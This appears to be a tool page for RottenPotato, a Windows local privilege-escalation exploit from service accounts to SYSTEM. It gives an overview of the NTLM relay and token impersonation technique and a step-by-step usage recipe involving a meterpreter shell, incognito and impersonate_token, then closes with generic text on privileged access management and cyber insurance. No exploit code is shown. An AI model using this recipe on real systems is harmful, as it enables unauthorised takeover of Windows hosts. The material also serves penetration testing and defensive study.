RottenPotato local privilege escalation from service account to SYSTEM

RottenPotato – Local Privilege Escalation from Windows Service Accounts to SYSTEM

The idea behind this vulnerability is simple to describe at a high level:

1. Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control.
2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls.
3. Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

Usage:

1. Compile.
2. Use ILMerge to combine Potato.exe, SharpCifs.dll NHttp.dll, and Microsoft.VisualStudio.OLE.Interop.dll. This will produce a single, portable binary.
3. Get a meterpreter shell on the target system
4. use incognito
5. Run the binary from step.2
6. impersonate_token “NT AUTHORITY\SYSTEM”

Demo

Rotten Potato – MSSQL Privilege Escalation

Rotten Potato – IIS Privilege Escalation

Download

For a technical overview of this exploit see our blog post here.

Privileged account management (PAM) can prevent the impersonation of tokens and misuse of user privileges by enforcing strict controls and monitoring user behavior. The implementation of PAM as a robust authentication mechanism reduces the risk of unauthorized access and potential damage to an organization’s system and data. In this context of privileged access, it is worthwhile to consider the difference between authorization vs authentication, authentication verifies the identity of a user while authorization determines the specific privileges and permissions granted to that authenticated user, ensuring granular control over their rights. Having the complexity of privileged access in mind, companies should consider utilizing cyber insurance as it provides financial protection and resources that help mitigate the potential damage caused by the abuse of privileged users. Covering costs such as incident response, legal expenses, and potential liability is the backbone of security once the damage is done.